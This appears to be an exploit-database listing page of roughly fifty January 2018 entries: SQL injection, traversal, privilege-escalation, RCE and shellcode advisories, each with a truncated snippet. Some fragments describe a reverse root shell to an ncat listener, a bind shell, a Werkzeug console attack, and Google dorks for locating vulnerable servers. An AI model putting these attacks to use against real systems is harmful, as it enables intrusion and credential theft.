FiberHome AN5506 - Remote DNS Change

FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability Software Version RP2617 Device Model AN5506-04-F Vendor Homepage: www.fiberhome.com/ Date: 01/02/2018 Exploit Author: r0ots3c http://wandoelmo.com.br https://www.facebook.com/wsec.info Description: Vulnerability exists in web...

Joomla! Component JMS Music 1.1.1 - SQL Injection

Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: https://www.joommasters.com/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/ Version: 1.1.1 Category: Webapps Tested on:...

Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal

Exploit Title: Oracle Hospitality Simphony MICROS directory traversal Date: 30.01.2018 Exploit Author: Dmitry Chastuhin https://twitter.com/chipik Vendor Homepage: http://www.oracle.com/ Version: 2.7, 2.8 and 2.9 Tested on: Win, nix CVE : CVE-2018-2636 !/usr/bin/env python...

Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation

define GNUSOURCE include include include include include include include include include include include include include include include define RINGSIZE 0x2000000 define PIPESIZE 0xb8 define PTRSIZE 0x8 define STRHDRSIZE 0x18 define LEAKOFFSET 0x68 define SHELLCODEOFFSET 0x200 define...

Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload

Exploit Title: Joomla! Component Jimtawl 2.2.5 - Arbitrary File Upload Dork: N/A Date: 01.02.2018 Vendor Homepage: http://janguo.de/ Software Link: https://extensions.joomla.org/extensions/extension/multimedia/streaming-a-broadcasting/jimtawl/ Software Download:...

Advance Loan Management System - 'id' SQL Injection

Exploit Title: Advance Loan Management System - 'id' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/advance-loan-management-system-with-savings-system-and-sms-notification/21283070 Version: 1.0 Tested on:...

Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection

Exploit Title: Joomla! Component JEXTN Classified 1.0.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/jextn-classified/ Version: 1.0.0 Category: Webapps Tested on:...

Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection

...

IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting

Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting XSS Date: 1-31-2017 Software Link: https://www.ipswitch.com/moveit Affected Version: 8.1-9.4 only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable Exploit Author: 1N3@CrowdShield - https://crowdshield.com Early...

Fancy Clone Script - 'search_browse_product' SQL Injection

Exploit Title: Fancy Clone Script - 'searchbrowseproduct' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://pofitec.com/ Software Link: https://pofitec.com/fancy-clone-script.php Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13.3 Email: [email protected] Contac...

Event Manager 1.0 - SQL Injection

Exploit Title: Event Manager PHP Script 1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://ezcode.pt/ Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741 Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author:...

Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access

STX Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis November 2017 PoC: https://github.com/mcw0/PoC Python...

BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'BMC Server Automation RSCD Agent NSH Remote ' \ 'Command Execution', 'Description' = %q This module exploits a weak access control check in the B...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)

Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...

Geovision Inc. IP Camera & Video - Remote Command Execution

!/usr/bin/env python2.7 SOF Geovision Inc. IP Camera & Video Server Remote Command Execution PoC Researcher: bashis November 2017 1. Pop stunnel TLSv1 reverse root shell Local listener: 'ncat -vlp --ssl'; Verified w/ v7.60 2. Dump all settings of remote IPC with Login/Passwd in cleartext Using: -...

WebKit - 'detachWrapper' Use-After-Free

::detachWrapper /Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0xfe2b9f...

WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free

function jsfuzzer var b = document.createElement"body"; a.appendb; ta.autofocus = true; var iframe = document.createElement"iframe"; b.appendChildiframe; li.appendChilddd; iframe.contentDocument.caretRangeFromPoint; function eventhandler ta.insertAdjacentElement"beforeBegin",a; ::operator...

Hotspot Shield - Information Disclosure

Vulnerability Summary The following advisory describes a information disclosure found in Hotspot Shield. Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming, news, dating, gaming wherever you are.”...

Joomla! Component Picture Calendar for Joomla! 3.1.4 - Directory Traversal

Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/ Version:...

LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow

!/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link: http://www.labf.com/download/nfsaxe.exe Tested on: Windows 7 x86...

BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure

Exploit Title: BMC BladeLogic RSCD agent get Windows users Filename: BMCwinUsers.py Github: https://github.com/bao7uo/bmcbladelogic Date: 2018-01-27 Exploit Author: Paul Taylor / Foregenix Ltd Website: http://www.foregenix.com/blog Version: BMC RSCD agent 8.3.00.64 CVE: CVE-2016-5063 Vendor...

Joomla! Component Visual Calendar 3.1.3 - 'id' SQL Injection

Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/ Version: 3.1.3 Category: Webapps Tested o...

Advantech WebAccess < 8.3 - SQL Injection

!/usr/bin/python2.7 Exploit Title: Advantech WebAccess BWSCADARest Login Method SQL Injection Authentication Bypass Vulnerability Date: 01-13-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...

Joomla! Component CP Event Calendar 3.0.1 - 'id' SQL Injection

Exploit Title: Joomla! Component CP Event Calendar 3.0.1 - SQL Injection Dork: N/A Date: 30.01.2018 Vendor Homepage: http://www.joomlacalendars.com/ Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/cp-event-calendar/ Version: 3.0.1 Category: Webapps Test...

HPE iMC 7.3 - RMI Java Deserialization

Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability Date: 01-28-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.hpe.com Software Link:...

System Shield 5.0.0.136 - Privilege Escalation

/ Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 - amp.sys Tested on OS - 64bit Windows 7 and...

systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation

Product: systemd systemd-tmpfiles Versions-affected: 236 and earlier Author: Michael Orlitzky Fixed-in: commit 5579f85 , version 237 Bug-report: https://github.com/systemd/systemd/issues/7736 Acknowledgments: Lennart Poettering who, instead of calling me an idiot for not realizing that systemd...

Arq 5.10 - Local Privilege Escalation (1)

!/usr/bin/env ruby Arq USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT USER'S CRONTAB! $binarytarget = "/tmp/arq510exp" class Arq510PrivEsc def i...

Arq 5.10 - Local Privilege Escalation (2)

!/bin/bash Arq payload.sh EOF !/bin/bash rm -rf $HOME/.arq510privescexp while : do pid=\ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\ if "$pid" != "" ; then ki...

macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding

/ The sysctls vfs.generic.conf. are handled by sysctlvfsgenericconf, which is implemented as follows: static int sysctlvfsgenericconf SYSCTLHANDLERARGS int name, namelen; struct vfstable vfsp; struct vfsconf vfsc; voidoidp; name = arg1; namelen = arg2; check for namelen==1 mountlistlock; for vfsp...

iBall WRA150N - Multiple Vulnerabilities

Vulnerabilities summary The following advisory describes two 2 vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n. iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The key is if you are using an ADSL2+ connectio...

Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle WebLogic wls-wsat Component Deserialization RCE', 'Description' = %q The Oracle WebLogic WLS WSAT Component is vulnerable to a XML...

PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal

Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone filetype:php login Version:...

Artifex MuJS 1.0.2 - Denial of Service

Hello, I want to submit the following bug: The jsstrtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an integer overflow because of incorrect exponent validation. Exploit Title: Integer signedness error leading to Out-of-bounds read that causes crash Date: 2018-01-24 Exploit Author:...

Werkzeug - 'Debug Shell' Command Execution

!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)

Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh+ Null-Free Shellcode 80 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Reverse Shell TCP /bin/sh. Null free shellcode 80 bytes Date: 2018-01-25 Tested: armv7l Raspberry Pi v3 Author: rtmcx - twitter: @rtmcx / .section .tex...

Linux/x86 - Egghunter Shellcode (12 Bytes)

Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...

Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution

!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get it executed... Notes: ====== - For this particular PoC, all I did was exec a bind shell using...

Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection

Exploit Title: Multilanguage Real Estate MLM Script = 3.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script Version: = 3.0 Category: Webapps...

Artifex MuJS 1.0.2 - Integer Overflow

Exploit Title: DoS caused by the interactive call between two functions Date: 2018-01-16 Exploit Author: Andrea Sindoni - @invictus1306 Vendor: Artifex https://www.artifex.com/ Software Link: https://github.com/ccxvii/mujs Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca Tested on: Linux...

Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)

EDB Note http://ps3xploit.com/help/dumper.html EDB Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip Dumper Help Warning: Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despit...

Netis WF2419 Router - Cross-Site Request Forgery

Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery CSRF Date: 28/01/2018 Exploit Author: Sajibe Kanti Author Contact: https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419, V2.2.36123 Tested on: Windows 10 Technical Details & Descriptio...

TSiteBuilder 1.0 - SQL Injection

Exploit Title: TSiteBuilder 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.datacomponents.net/ Software Link: http://www.datacomponents.net/products/website/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan Author Web...

Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download

Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Dork: N/A Date: 27.01.2018 Vendor Homepage: https://joomlatag.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/ Version: 5.3.7...

Nexpose < 6.4.66 - Cross-Site Request Forgery

Exploit Title: Cross Site Request Forgery at Nexpose Automated Actions Release Date: 2017-12-13 Exploit Author: Shwetabh Vishnoi Link: https://www.linkedin.com/in/shwetabhvishnoi Vendor Homepage: https://www.rapid7.com/ Software Link: https://www.rapid7.com/products/nexpose/download/ Tested on:...

KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery

Exploit Title: Application wide CSRF Bypass Date: Sep, 2017 Exploit Author: Saurabh Banawar Vendor Homepage: http://keystonejs.com/ Software Link: https://github.com/keystonejs/keystone Version: 4.0.0 Tested on: Windows 8.1 CVE : 2017-16570 Link: https://vuldb.com/?id.109170 Exploit:...

Buddy Zone 2.9.9 - SQL Injection

Exploit Title: Vastal I-Tech Facebook Clone 2.9.9 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://vastal.com/ Software Link: http://vastal.com/buddy-zone-social-networking-script.html Version: 2.9.9 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsa...

Hot Scripts Clone - 'subctid' SQL Injection

Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified Version: 1.0 Category: Webapps Tested on:...

Task Rabbit Clone 1.0 - 'id' SQL Injection

Exploit Title: Task Rabbit Clone 1.0 - SQL Injection Dork: N/A Date: 27.01.2018 Vendor Homepage: http://migrateshop.com/ Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/ Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A Exploit Author: Ihsan Sencan...

PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection

Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection Date: 08/14/2017 Software Link: http://www.pacsone.net/download.htm Version: PACSOne Server 6.6.2 Exploit Author: Carlos Avila Google Dork: inurl:pacs/login.php inurl:pacsone/login.php inurl:pacsone filetype:php home inurl:pacsone...